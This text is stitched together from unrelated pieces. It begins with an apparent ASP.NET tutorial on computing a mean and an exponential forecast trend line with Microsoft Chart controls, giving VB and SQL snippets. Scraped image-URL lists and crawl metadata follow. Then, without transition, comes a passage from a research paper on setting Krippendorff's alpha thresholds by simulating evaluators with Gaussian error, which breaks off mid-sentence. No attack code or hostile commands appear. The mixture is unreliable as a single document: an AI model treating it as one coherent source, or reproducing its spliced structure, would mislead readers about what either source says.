application.\n• Exporting Charts - allow visitors to export charts as images and PDF files.\n• ## Introduction\n\nThe Microsoft Chart controls make it easy to take data from a database or some other data store and present it as a chart. As discussed in Plotting Chart Data, the Chart controls offer a myriad of ways to get data into a chart. You can add the data programmatically, point-by-point, or you can bind an ADO.NET `DataTable` directly to the Chart. You can even use declarative data source controls, like the SqlDataSource or ObjectDataSource controls.\n\nIn addition to converting your specified data points into a chart image, the Chart controls also include a wealth of statistical formulae that you can use to analyze the plotted data. For example, with a single line of code you determine the mean (average) value for data in a particular series. Likewise, with one line of code you can get the median, variance, or standard deviation. These values can be displayed as text on the page or as a stripe line on the chart itself. What's more, the Chart controls include functions to forecast future values, to compute moving averages, to identify trends, and to determine rates of change, among others.\n\nThis article looks at how to use two statistical formulae. Specifically, we'll look at how to compute and display the mean of a series, as well as how to display an exponential trend line on the chart to forecast future values. Read on to learn more!\n\n- continued -\n\n## Computing the Mean Value of a Series of Data Points\n\nGiven a list of numbers, the arithmetic mean is the sum of those numbers divided by the total quantity of numbers in the list. The mean is more colloquially referred to as the \"average,\" and is a common metric used to analyze data.\n\nA chart consists of one or more series, which are lists of data points. Typically, each data point is a pair of numbers that provide both the X value and Y value to be plotted. For some charts it may be helpful to know the average value of the data points plotted in a series. Consider a chart that shows gross sales by month for a particular product. In this case the X axis would list off the months (January, February, ...) while the Y axis would show the gross sales per month. In such a chart it might be helpful to know the mean (average) gross sales per month.\n\nYou could certainly compute the mean gross sales per month with a few lines of code that loop through the data points, sum up the values, and then divide by the count of data points. There's no need to write that code, however, because the Microsoft Chart controls provide a built-in function for computing the mean of a series:\n\n ``` 'Determine the mean of the series SalesByMonth Dim mean As Double = ChartID.DataManipulator.Statistics.Mean(\"SalesByMonth\")```\n\nSimilarly, you can compute the median or the variance using the `Median` or the `Variance` functions in much the same way.\n\nThe demo available for download at the end of this article includes a page named `MeanSales.aspx`, which displays a line chart showing monthly sales for the products in a specific category for a specific year along with the mean monthly sales. The mean monthly sales are displayed in two ways: as text and as a stripe line on the chart itself. The screen shot below shows the monthly sales for those products in the Produce category for 1997. Note that the average sales per month - \\$4,809.88 - is shown both as text on the page and as an orange line on the chart.",
null,
"To create this chart I started by adding two DropDownList controls to the page named `ddlCategory` and `ddlForYear`. The `ddlCategory` DropDownList is bound to a SqlDataSource control that populates it with the categories in the `Categories` database table. The `ddlForYear` contains three `ListItem`s - 1996, 1997, and 1998 - one for each year for which sales data exist. I also added a Label control (`lblAverageSales`) to display the mean sales per month as text.\n\nNext, I added the Chart control to the page named `chtCategorySales` and bound it to a SqlDataSource control named `dsCategorySales`. The SqlDataSource control executes the following query, which returns each month with sales for products in a particular category for a particular year.\n\n ``` SELECT MONTH(o.OrderDate) AS Month, SUM(od.UnitPrice * od.Quantity) AS Total FROM Orders AS o INNER JOIN [Order Details] AS od ON o.OrderID = od.OrderID INNER JOIN Products AS p ON p.ProductID = od.ProductID WHERE (p.CategoryID = @CategoryID) AND (YEAR(o.OrderDate) = @ForYear) GROUP BY MONTH(o.OrderDate) ORDER BY Month```\n\nThe Chart control contains a single line chart series named `SalesByMonth`, which has its `XValueMember` and `YValueMembers` properties set to the names of the columns returned from the database query (`Month` and `Total`, respectively). The Chart control's declarative markup also defines a chart area (`MainChartArea`) with some Y axis settings. Namely, I configured the Y axis to format its labels as currency values (with no decimal places) and to add an orange stripe line. A stripe line is a line (or band) that can be added to the X or Y axis and used to show a particular value or range of values. In this case, I use the stripe line to show the average sales per month. The position of the stripe line is based on its `IntervalOffset` property, which is programmatically set to the mean value (we'll explore this code momentarily).\n\n ``` ```\n\nThe SqlDataSource plus the Chart's declarative markup is sufficient to display a chart of the gross sales per month for the selected category and year. In order to show the mean sales per month we need to write a few lines of code. Keep in mind that we cannot calculate the mean until the series is populated with data. When using a Chart that is bound to a data source control you know that the data has been plotted once the `DataBound` event is raised. Therefore, I've created an event handler for this event and placed the code to compute and display the mean there. (If you are adding the points programmatically rather than from a declarative data source control then you would add this code immediately after the code that plots your data. The forecasting demo we'll look at shortly provides such an example.)\n\n ``` Protected Sub chtCategorySales_DataBound(ByVal sender As Object, ByVal e As System.EventArgs) Handles chtCategorySales.DataBound 'Determine the mean Dim mean As Double = chtCategorySales.DataManipulator.Statistics.Mean(\"SalesByMonth\") 'Display mean as text lblAverageSales.Text = mean.ToString(\"C\") 'Display stripe line chtCategorySales.ChartAreas(\"MainChartArea\").AxisY.StripLines(0).IntervalOffset = mean End Sub```\n\nHere we calculate the mean, display it in the `lblAverageSales` Label control, and assign it to the stripe line's `IntervalOffset` property. The net effect is that when the chart is plotted the mean sales per month is calculated and displayed both as text on the page and as a stripe line on the chart.\n\n## Using Forecasting Statistical Formulae\n\nThere are a variety of statistical formulae that can be used for forecasting. In brief, these formulae typically work by arriving at an equation whose line closely models the existing, known data points. This equation can then be extended to forecast future values. To apply a forecasting formula you must supply the following inputs:\n• The forecasting parameters, which must be formatted into a comma-delimited string. There are four optional parameters:\n• Regression Type - determines the type of equation to fit against the known points. You can specify a a numeric value to indicate the polynomial regression, or you may use one of the following regression types: `Linear`, `Exponential`, `Logarithmic`, or `Power`.\n• Period - the number of time units in the future to forecast. For example, to forecast three months in the future for monthly sales you would use a value of 3 here.\n• Approximate Error - a Boolean value that indicates whether to output the approximation error.\n• Forecast Error - a Boolean value that indicates whether to output the forecasting error.\n• The input series, namely the data for which the forecasts are being made.\n• The output series. If you are outputting the approximate or forecasting errors then you will need to have a series for both the forecast and the errors.\nTo apply a forecasting formula use the code like the following:\n\n `ChartID.DataManipulator.FinancialFormula(FinancialFormula.Forecasting, parameters, inputSeries, outputSeries)`\n\nThe demo available for download at the end of this article includes a page named `Trendline.aspx`, which uses an exponential regression to predict sales figures three months into the future. The following screen shot shows the sales figures for Dairy Products sales in 1997 and the forecast for the first quarter of 1998. Things are looking up!",
null,
"Like the mean sales demo, to create the `Trendline.aspx` I started by adding and configuring two DropDownList controls to the page to capture the category and year used to power the report. I then added the Chart control to the page. Rather than use a SqlDataSource control to declaratively bind the data to the chart, I instead decided to bind the data to the chart programmatically. (Using a SqlDataSource here certainly would have worked just fine.) Before we look at the code, let's take a peak at the Chart control's declarative markup. Recall that in the previous example we added a stripe line to the Y axis to show the mean sales per month. We don't need a stripe line for this chart, but we do need to define two series - one for the sales per month (`SalesByMonth`) and another for the forecasting trend line (`TrendLine`).\n\n ``` ... ```\n\nIf you want to include the approximate error or forecasting error you'd need to include series for these (most likely Range series).\n\nThe sales per month data is actually added to the chart from code in the `Page_Load` event handler. Specifically, a connection is made to the database, an ad-hoc query is executed that gets the sales data, and the results are enumerated, with each record returned from the database added to the `SalesByMonth` series. After the data has been plotted, an Exponential regression is used to add the forecast data to the `TrendLine` series. An abbreviated version of the `Page_Load` event handler code follows:\n\n ``` Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load Using myConnection As New SqlConnection ... Get sales per month data from database for selected category / year and add it to the chart point-by-point ... End Using 'Add a trend line using an exponential regression chtCategorySales.DataManipulator.FinancialFormula(FinancialFormula.Forecasting, _ \"Exponential,3,false,false\", _ chtCategorySales.Series(\"SalesByMonth\"), _ chtCategorySales.Series(\"TrendLine\")) End Sub```\n\nThe code that actually queries the database and plots the points one at a time has been removed for brevity. Download the demo to see the full code; refer to Plotting Chart Data for detailed examples on adding chart data point-by-point.\n\nThe red code in the snippet above adds the forecasting trend line to the chart's `TrendLine` series, forecasting sales per month three months into the future.\n\n## Conclusion\n\nIn addition to merely displaying plotted data, the Microsoft Chart controls include functionality for analyzing that data using a variety of statistical formulae. This article explored how to use this functionality to compute the mean (average) value in a series and how to add a trend line to forecast future results. These two examples just scratch the surface of the statistical capabilities of the Chart control - there are many more formulae available, including functions to compute moving and weighted moving averages, ranges, statistical distributions, and more.\n\nHappy Programming!\n\n• By Scott Mitchell\n\nAttachments:",
null,
"",
null,
"#brand-footer{text-align:center;margin:0 auto;} #commonfooterpropertytext{padding-bottom: 12px;} #commonfootercopyright{padding: 3px;} #eweekBrand-footer{text-align:center;margin:0 auto} #footerDisclaimerText{margin: 15px 10px 0px 10px; text-align: justify;}",
null,
"Advertiser Disclosure:"
] | [
null,
"https://www.4guysfromrolla.com/img/4guyslogo.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/search.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/site-index.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/images/xml.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/leftnav-btm.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/leftnav-resources.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/leftnav-btm-gray.gif",
null,
"https://www.4guysfromrolla.com/img/sp.gif",
null,
"https://www.4guysfromrolla.com/img/asp-topnav.gif",
null,
"https://www.4guysfromrolla.com/img/aspnet-topnav.gif",
null,
"https://www.4guysfromrolla.com/img/aspfaqs-topnav.gif",
null,
"https://www.4guysfromrolla.com/img/feedback-topnav.gif",
null,
"https://www.4guysfromrolla.com/img/topnav-right.gif",
null,
"https://www.4guysfromrolla.com/images/mschart20.png",
null,
"https://www.4guysfromrolla.com/images/mschart21.png",
null,
"https://www.4guysfromrolla.com/img/btm-left.gif",
null,
"https://www.4guysfromrolla.com/img/btm-right.gif",
null,
"https://www.4guysfromrolla.com/articles/111809-1.aspx",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.880283,"math_prob":0.83262455,"size":11449,"snap":"2020-45-2020-50","text_gpt3_token_len":2408,"char_repetition_ratio":0.1351682,"word_repetition_ratio":0.08008321,"special_character_ratio":0.20001747,"punctuation_ratio":0.092322186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96142775,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58],"im_url_duplicate_count":[null,null,null,null,null,5,null,null,null,5,null,null,null,5,null,null,null,null,null,5,null,null,null,null,null,null,null,5,null,null,null,null,null,null,null,5,null,null,null,5,null,5,null,5,null,5,null,5,null,4,null,4,null,5,null,5,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-05T22:33:03Z\",\"WARC-Record-ID\":\"<urn:uuid:9b9866f8-f63f-4cd3-8370-7819d844820b>\",\"Content-Length\":\"56092\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5642f91b-a7b1-40bc-998a-a6998b469ca9>\",\"WARC-Concurrent-To\":\"<urn:uuid:7561dfa6-65f0-4b37-a533-b7148d291ecc>\",\"WARC-IP-Address\":\"70.42.23.156\",\"WARC-Target-URI\":\"https://www.4guysfromrolla.com/articles/111809-1.aspx\",\"WARC-Payload-Digest\":\"sha1:GELLYXIAHKJTEDB4TE72IL7326NM2IBR\",\"WARC-Block-Digest\":\"sha1:5OH4V55BOETL7MOG6DA3EXC5HS6TJK7M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141750841.83_warc_CC-MAIN-20201205211729-20201206001729-00345.warc.gz\"}"} |
https://bmcmedresmethodol.biomedcentral.com/articles/10.1186/s12874-018-0606-7 | [
"# Reliability in evaluator-based tests: using simulation-constructed models to determine contextually relevant agreement thresholds\n\n## Abstract\n\n### Background\n\nIndices of inter-evaluator reliability are used in many fields such as computational linguistics, psychology, and medical science; however, the interpretation of resulting values and determination of appropriate thresholds lack context and are often guided only by arbitrary “rules of thumb” or simply not addressed at all. Our goal for this work was to develop a method for determining the relationship between inter-evaluator agreement and error to facilitate meaningful interpretation of values, thresholds, and reliability.\n\n### Methods\n\nThree expert human evaluators completed a video analysis task, and averaged their results together to create a reference dataset of 300 time measurements. We simulated unique combinations of systematic error and random error onto the reference dataset to generate 4900 new hypothetical evaluators (each with 300 time measurements). The systematic errors and random errors made by the hypothetical evaluator population were approximated as the mean and variance of a normally-distributed error signal. Calculating the error (using percent error) and inter-evaluator agreement (using Krippendorff’s alpha) between each hypothetical evaluator and the reference dataset allowed us to establish a mathematical model and value envelope of the worst possible percent error for any given amount of agreement.\n\n### Results\n\nWe used the relationship between inter-evaluator agreement and error to make an informed judgment of an acceptable threshold for Krippendorff’s alpha within the context of our specific test. To demonstrate the utility of our modeling approach, we calculated the percent error and Krippendorff’s alpha between the reference dataset and a new cohort of trained human evaluators and used our contextually-derived Krippendorff’s alpha threshold as a gauge of evaluator quality. Although all evaluators had relatively high agreement (> 0.9) compared to the rule of thumb (0.8), our agreement threshold permitted evaluators with low error, while rejecting one evaluator with relatively high error.\n\n### Conclusions\n\nWe found that our approach established threshold values of reliability, within the context of our evaluation criteria, that were far less permissive than the typically accepted “rule of thumb” cutoff for Krippendorff’s alpha. This procedure provides a less arbitrary method for determining a reliability threshold and can be tailored to work within the context of any reliability index.\n\n## Background\n\nInter-evaluator reliability is a widely-debated topic relevant to a variety of fields such as communication, computational linguistics, psychology, sociology, education, and medical science, among others [1, 2]. Although the consequences of evaluator-based tests vary, some evaluator-based tests, such as those used in medicine, may strongly influence the diagnosis and treatment of patients.\n\nEvaluators are typically employed when a desired functional or clinically-relevant value is otherwise unmeasurable. In some of these cases, there may indeed be an objective or ideal “correct” answer, but because the variable is, in principle, unmeasurable, it is impossible to know how accurate the evaluator is in arriving at this ideal answer. By generating data using multiple evaluators and comparing responses, we can begin to gauge the quality of the evaluators, the measurement process, the generated data, the evaluators, and the resulting conclusions [3,4,5,6].\n\nInter-evaluator reliability is discussed using different terminologies across disciplines, with concepts such as evaluator “agreement” and “reliability” used to varying degrees of consistency. Regardless of the terminology, inter-evaluator reliability can be described as the likelihood that different influences such as evaluators, methods, and approaches, will produce the same results or interpretations [2, 7]. More formally, the keyterm ‘reliability’ is defined as the ratio of the variability of what is being measured to the variability of the measurement process . Therefore, high reliability indicates that measurement error is small, while low reliability suggests high variability and measurement error. For evaluator-based tests, inter-evaluator reliability cannot be measured directly . As the variable of interest is not precisely known, comparisons between its true variability and the variability of the measurements cannot be made. Instead, agreement between evaluators is measured and used as a proxy to qualitatively infer inter-evaluator reliability [9,10,11].\n\nThe effective usage of inter-evaluator agreement measures is limited by a lack of standardization in application and interpretation. For example, many statistics to measure inter-evaluator agreement (commonly referred to as “inter-evaluator reliability indices”) have been proposed; however, because of the specificity required by actual implementation, most are considered unsuitable for general use [5, 7, 9, 12, 13]. This means that different studies may often use different reliability indices, which may make comparisons of their results problematic. Perhaps the greater limitation with inter-evaluator reliability indices is the general difficulty in interpreting their numerical outcomes; understanding these numerical outcomes is critical to appropriately assessing the trustworthiness of the reliability data. Typically, the possible values for a reliability index range from 0 to 1, where 0 suggests the absence of reliability and 1 suggests perfect reliability. Devising a universal threshold of “acceptability” between 0 and 1, that works for any dataset independent of context, is not likely possible . For most indices (e.g., Bennet et al.’s S, Cohen’s κ, Scott’s π, Krippendorff’s α) it is commonly suggested that a cutoff threshold value of 0.8 is a marker of good reliability, with a range of 0.667 to 0.8 allowing for tentative conclusions [4, 9, 11, 13,14,15,16]. Interestingly, these threshold values are often employed with the knowledge of their largely arbitrary determination, and used in spite of suggestions that they are likely unsuitable for generalization [4, 10, 11, 15, 16]. This can pose the problem of incorrect interpretation of results, as using an unacceptably-low agreement threshold can result in unreliable data being trusted and increasing the likelihood of drawing invalid conclusions. Inversely, an overly-strict agreement threshold may lead to discarding valid findings. An inappropriate agreement threshold could also preclude opportunities for exploring and correcting sources of unreliability in evaluators and/or evaluation methods. An ideal threshold value would be derived through analytical methods that provide a meaningful number in the specific context of its application and use.\n\nAn examination of the literature suggests that the issue of determining an appropriate reliability threshold is still an open problem, as few-to-no methodologies have been adopted for the determination of contextually-relevant threshold values to facilitate drawing conclusions from inter-evaluator data [2, 13]. Indeed, other investigators are still working to tackle this issue. Wilhelm et al. conducted a simulation study, with themes similar to those described in this paper, to determine how agreement thresholds impact the results of reliability studies . The necessity for a solution to this problem is clearly evidenced by a severe lack of consistency and systematicity in how inter-evaluator reliability measures are interpreted. In fact, we examined seven clinically-relevant inter-evaluator reliability studies that have been published since 2015 and found that for 4 of the 7 studies, it was unclear how benchmarks of reliability were determined (i.e., what constituted a good versus bad score) [18,19,20,21]. The three remaining studies each used a different source for inter-evaluator reliability interpretation guidelines, and thus used slightly different grading scales [22,23,24]. Additionally, reliability indices alone cannot tell us the error inherent to a group of evaluators attempting to measure a variable of interest. For example, Wilhelm et al. reviewed articles in two major journals and found that researchers tended to report inter-rater agreement above 0.80, without addressing the magnitude of score differences between raters , which is a central theme of our paper.\n\nIn addressing these fundamental gaps, this work develops a methodological framework to bridge the concepts of inter-evaluator reliability (reliability indices) and the potential measurement error in a functional or clinically-relevant value. We illustrate and evaluate the application of this framework using a quantitative example, where evaluators extracted time intervals from specific cues in video footage. We suggest that using this methodology, application-specific reliability thresholds can be determined for most any given task or reliability index. The development of such a technique may help unlock acceptable reliability index thresholds, establish performance benchmarks for evaluator training programs, and provide context directly to applications of reliability indices.\n\n## Methods\n\nThe methods are presented as a general methods section and a quantitative example. The quantitative example illustrates the application of the general methodology, and evaluates the performance of the techniques presented. It is important to note that the specific measures used in the quantitative example (i.e., Krippendorff’s alpha and percent error) were chosen for our specific application, and the general methods described in this paper are not limited to these reliability and error measures.\n\n### General methods\n\nThe goal of this work is to develop a methodology to establish a relationship between a chosen reliability index and the measurement error of a functional or clinically-relevant value. Our approach involves generating a large population of simulated evaluator data, and then calculating the error and agreement of each against a reference dataset. This creates a model between evaluator agreement and error, that describes how much error could be expected based on any given level of agreement (Fig. 1). The below step-by-step approach describes how this method is generally applied. The instructions are intended for investigators with a modest background in mathematics, statistics, and basic programming (such as MATLAB). The simulation time will vary based on several factors (calculation optimization, dataset size, simulation iterations, etc.). For our quantitative example, the simulation and calculations took approximately 1 to 2 h to run on a standard office desktop computer.\n\n#### Establish a reference dataset\n\nA reference dataset must be established for the evaluator test that is being modelled. The only requirement for the reference dataset is that it is representative of a typical dataset from that test. The reference dataset is not required to be empirical data; rather, the reference dataset could be generated from a distribution of, or a distribution parameterized to resemble, a population of test scores. This reference dataset will be used as a basis for generating and comparing the simulated evaluator population. There are no specific requirements for the length of the reference dataset. The authors do not wish to conjecture on the appropriate amount of data to be used when working with reliability indices, as the answer is likely context-sensitive, and has been investigated by others [25, 26]. At a minimum, it would seem necessary to include at least the same amount of data that would be used in a practical application or research study using that reliability index. For example, if one were generating a model to provide context to field applications of inter-evaluator reliability measures, then using a reference dataset of the same size that has been determined appropriate for those field applications would likely provide the most relevant model. It should be noted that the reference dataset is not required to be single instance of an evaluator test, but instead could be a concatenation of results from multiple independent instances of that test. Mathematically, we will refer to the reference dataset as Im, where m is the number of measurements in the dataset.\n\n#### Simulate a population of evaluators\n\nFor purposes of simplification, the reference dataset can now be thought of as a “perfect evaluator.” That is, the reference dataset is considered to be the result of an evaluator who is perfectly reliable, and has obtained the “correct” answer from evaluating the test. As stated above, the reference data do not need to be correct (or even empirical data), they are only referred to as correct for purposes of generating the model because they are used as a basis of comparison. Their actual correctness has no bearing on the model’s accuracy or validity. Each new evaluator is simulated by taking the reference dataset and introducing Gaussian noise into it. Taylor has shown that a Gaussian distribution is a valid first-order approximation of the two observational errors that are inherent to any system of measurement: systematic errors and random errors . These errors can be modelled by modifying the first (mean) and second (standard deviation) moments of the Gaussian distribution, respectively . In essence, the Gaussian distribution can be thought of as an evaluator whose likelihood of making a systematic error or random error is described by the mean and standard deviation of the Gaussian distribution. For example, an evaluator who makes systematic errors is described by a Gaussian distribution with a shifted mean (errors are systematically in the same direction) whereas an evaluator who makes random errors is described by a Gaussian distribution with a large standard deviation (errors randomly fall on either side of the average measurement). In practice, evaluator mistakes may not be perfectly Gaussian, but over many simulated trials, all evaluator errors would tend to a Gaussian distribution due to the central limit theorem.\n\nA set of random variables from Gaussian distributions (we will call this set “$$\\mathcal{X}$$”) must be generated to capture at least the range of evaluator behavior that may be practically expected; additional distributions may be generated to capture more erroneous behavior, but this may incur additional computation time. The total number of random Gaussian variables (the size of set $$\\mathcal{X}$$) generated will depend on the chosen step-size and range of systematic error and random error to be investigated, and this is heavily dependent on the specific task. In many cases, it may be appropriate to increment systematic error and random error by the resolution of rating units used in the test (i.e., the smallest change in measurement an evaluator can make). If a continuous scale is being used, an appropriate error step-size will have to be determined; there is no set procedure for determining the error step-size, and this will have to be done at the discretion of the investigator. A general rule might be to use the smallest step-size that is still detectable or has meaningful relevance to the test (e.g., a step-size of one nanosecond would be too fine of a resolution for a human reaction time task, whereas a step-size of a second would be too coarse). In the case of nominal data, where only two rating units are available, the error step-size may be thought of as a probability step-size. It should be noted that this method allows for the step-size and range of systematic error and random error to be chosen independently.\n\nThe chosen values of systematic error to investigate will be represented by the array μ, and the length of that array (the chosen range of error divided by the chosen resolution) will be referred to as, and indexed by, i. Similarly, the values of random error will be represented by the array σ, and the length of that array will be referred to as, and indexed by, j. Additionally, the μ and σ arrays should each contain the value “0,” representing an evaluator who does not make that type of measurement error. Therefore, the equation\n\n$${\\mathcal{X}}_{ij}\\sim \\mathcal{N}\\left({\\mu}_i,{\\sigma}_j\\right)$$\n(1)\n\ndescribes an i by j matrix of Gaussian random variables, where i and j index the mean (μ) and standard deviation (σ) of the $${\\mathcal{X}}_{ij}$$ Gaussian distributions from which the random variables were generated, respectively. New i * j Gaussian random variables are generated along the m dimension, so that there are i by j random variables for each m measurement in the reference dataset. Next, the reference dataset, Im, must be replicated along the i and j dimensions. Thus, Iijm is a matrix of the reference data and there are i * j copies of each m measurement, so that each m measurement can be modified by each ij Gaussian random variable. The final step is to generate the simulated evaluator population, I′, calculated as\n\n$${I}_{ijm}^{\\prime }={I}_{ijm}+{\\mathcal{X}}_{ijm}.$$\n(2)\n\nEach element of Iijm is modified by a random value generated from one of the Gaussian distributions, whose parameters are described by i and j. The result is a population of simulated evaluators, matrix I’ijm. Each ij evaluator, whose measurement errors are described by $${\\mathcal{X}}_{ij}$$, has made m measurements. As previously stated, the evaluator whose μ = 0 and σ = 0 is the perfect evaluator (the initial reference dataset) who will be the basis of comparison for all other simulated evaluators.\n\nThis process relies on the sampling of random variables ($${\\mathcal{X}}_{ijm}$$), and therefore the simulation should be repeated N multiple times. This smooths the randomness of the data and allows for a more robust model. Our methodology has no inherent requirements about the number of times the simulation should be repeated. Many others have investigated optimal sample sizes for simulation studies [28, 29], and their work may be considered when choosing the number of iterations for this simulation method. In general, increasing the number of simulations improves the final result but increases computation time. Thus, the result of the simulation should be i * j evaluator datasets of length m, where each ijm combination has been simulated N times (with each simulation sampling ijm new random variables from the ij Gaussian distributions).\n\n#### Create the model\n\nOnce the evaluator population has been simulated, agreement and error must be calculated for each of the N * i * j evaluators. In other words, each combination of i and j must be compared to the μ = 0, σ = 0 perfect evaluator (the reference dataset). Our method is not limited to any particular agreement or error calculation, so this step is dependent on the reliability index and error calculation that are most appropriate to the evaluator task. However, the manner in which agreement and error measures are calculated should be reflective of how they would be applied in practice. For example, if the result of an evaluator test is interpreted by adding all of the evaluator’s individual scores together, then error should be calculated on this sum. Alternatively, if an evaluator’s results are interpreted by averaging all of their individual scores together, then error should be calculated on this averaged score. Generally, it is likely that the best method for calculating agreement is to compare each individual score between the evaluators. However, it is most important that agreement is calculated in the way that has been deemed most appropriate for the practical application or research study, as this will provide the most relevant model between agreement and error.\n\nOnce agreement and error have been calculated for each evaluator relative to the reference dataset, agreement and error should be averaged by observational error parameters across all N simulations. That is, every evaluator who had both the same μ and σ could be considered to have been the same evaluator (as they were exactly as probable to make the same mistakes), and therefore their agreement and error from all N simulations should be averaged together to quantify their average performance, thus smoothing the simulated data. This should result in i * j four-dimensional datasets which each contain an agreement, error, μi, and σj value, one for each i * j evaluator. The agreement and error of all evaluators can now be plotted against each other to model how much error can be expected from an evaluator based on their level of agreement. Optionally, systematic error (μi) and random error (σj) can be plotted for each evaluator (e.g., by color or size of markers, see below for example) to further understand how observational errors affect agreement and error. It would generally be expected that an envelope would form; essentially, this is a boundary that emerges which describes the most amount of error (worst-case error) an evaluator could be expected to have, based on their calculated agreement. We demonstrate this below in our quantitative example. A function may be fit to this envelope which allows a mathematical description relating agreement and worst-case error.\n\n### Quantitative example\n\nThis quantitative example is provided to illustrate how the method is applied, and because it was a practical challenge that we encountered in our research; the solution to which was the basis of this general method. Again, it is important to clarify that the specifics of how the method is applied (agreement measure, error measure, etc.) to this evaluator task are not due to inherent limitations of the method, rather, our selected reliability index, error measure, error-step size, etc., were chosen as the most appropriate for our particular evaluator task.\n\n#### Establish a reference dataset\n\nThree research professionals analyzed video footage, with the goal of improving internal processes. They judged and recorded times of two distinct reoccurring events. The video was obtained under a Defense Advanced Research Projects Administration research study and contained footage of an anonymous consented participant transferring rubber blocks between two compartments of a wooden box. Evaluators worked in isolation using media player software which allowed forward and backward frame-by-frame scrubbing. They scanned through the video and determined the times at which the participant grasped blocks in one compartment and the times at which they released them into the other compartment. They recorded these video timing events into a spreadsheet, producing a total of 300 timing measurements for each evaluator. Each individual timing event was taken and averaged across the three expert evaluators to produce a single representative 300-point reference dataset.\n\n#### Simulate a population of evaluators\n\nWe wrote a custom MATLAB (Mathworks, Natick, MA) script to create 49 unique simulated evaluators by injecting error into the reference dataset. To do this, the script generated 49 Gaussian distributions, each with different combinations of mean and standard deviation parameters, which represented systematic error (μ) and random error (σ), respectively. In other words, each of the 49 combinations of μ and σ generated a distinct Gaussian distribution, where each Gaussian distribution represented the observational errors made by different simulated evaluators. The analyzed video footage was recorded at 30 frames per second, so the step-size for μ and σ of the Gaussian distributions was chosen to be 0.033 s (one video frame), the smallest possible error. The values of μ and σ ranged from 0 to 0.198 s (0 to 6 video frames), for a total of 49 combinations. In cases where μ was low and σ was high, some simulated evaluators occasionally selected negative values (about 0.3% of measurements). While our chosen range of random error resulted in this unrealistic circumstance, we wanted to ensure that we captured a sufficient range of evaluator error to build our model. In our application, negative and zero-duration timing events were not possible, so these values were defaulted to 0.033 s (the minimum resolvable time for an event, one video frame). This introduced a small amount of bias to cases with high random error relative to systematic error which can be seen in the results; we discuss this in more detail below.\n\nThree hundred random numbers were then chosen from each of the 49 Gaussian distributions and added to the reference dataset to create 49 new unique hypothetical datasets each containing 300 modified timing values, as described above in Eqs. (1) and (2). In other words, each simulated evaluator made 300 different “mistakes”, one for each of the 300 measurements, with each error drawn from the evaluator’s own Gaussian distribution. Each of the 49 modified datasets represented a set of 300 imperfect scores generated by a simulated evaluator. It should be noted that our choice of using 300 measurements reflects how we would use inter-evaluator agreement in a practical application. That is, a complete execution of the test produces 300 measurements, and we would ideally measure inter-evaluator agreement on a full test dataset; thus, we chose to generate our model using a full 300-measurement dataset.\n\nTo smooth the randomness of the data, we repeated this process 100 times for each of the 49 Gaussian distributions. We stopped the simulation after 100 iterations, as this produced a smooth monotonic relationship between increasing random error and decreasing inter-evaluator agreement, which we deemed appropriate for our specific application. This resulted in 4900 unique hypothetical datasets. These new hypothetical datasets were then used as the “results” obtained from 49 simulated evaluators, each completing the video analysis task 100 times.\n\n#### Create the model\n\nThe Krippendorff’s alpha and percent error were then calculated for each of the 4900 datasets, pairwise with the reference dataset, to explore relationships between Krippendorff’s alpha, percent error, systematic error, and random error. We specifically chose Krippendorff’s alpha as it was appropriate in the application of our data, which were time measurements (ratio data type). Krippendorff explains in detail how Krippendorff’s alpha is calculated in his 2011 manuscript . Here, we briefly summarize the calculation. We wrote a custom LabVIEW (National Instruments, Austin, TX) program which used the coincidence matrix calculation method (Eq. 3),\n\n$$\\alpha =1-\\left(n-1\\right)\\frac{\\sum_c{\\sum}_k\\kern0.5em {o}_{ck}\\ast \\kern0.5em {{}_{metric}\\delta}_{ck}^2}{\\sum_c\\sum \\limits_k\\kern0.50em {n}_c\\ast {n}_k\\ast {}_{metric}{\\delta}_{ck}^2},$$\n(3)\n\nand verified the accuracy of our program with ReCal OIR [30, 31]. Equation 3 was used for all Krippendorff’s alpha calculations, where n is the total number of measurements collected, c and k are each a separate index into the same set of unique values that increment independently to allow for generation of every allowable pairwise combination. The allowable pairwise combinations are xc and xk (the reliability data, see Eq. 4) for all possible values of c and k whereas nc and nk are the number of times that xc and xk are used in total. The number of occurrences of xc and xk value pairings within the reliability data are represented by ock. The type of reliability data being used dictates which “difference function” to use, defined as $${{}_{metric}\\delta}_{ck}^2$$, where metric is the data type. The difference function for ratio data is shown in Eq. (4):\n\n$${{}_{ratio}\\delta}_{ck}^2={\\left(\\frac{x_c-{x}_k}{x_c+{x}_k}\\right)}^2.$$\n(4)\n\nWe used the coincidence matrix to calculate Krippendorff’s alpha because it is the most computationally efficient method (Fig. 2). For our percent error calculations (Eq. 5, where Theoretical is the reference measurement and Experimental is the simulated measurement),\n\n$$Percent\\ error=\\frac{\\left| Theoretical- Experimental\\right|}{Theoretical}\\ast 100,$$\n(5)\n\nwe decided what part of the task provided the highest level of error. In our video rating task, the “speed” phase (50 timing events out of the 300) where the participant rapidly moved the blocks from one side of the box to the other was the most sensitive to timing errors because the events were so short. A small error in measurement produced a relatively large percent error. In our task, the individual 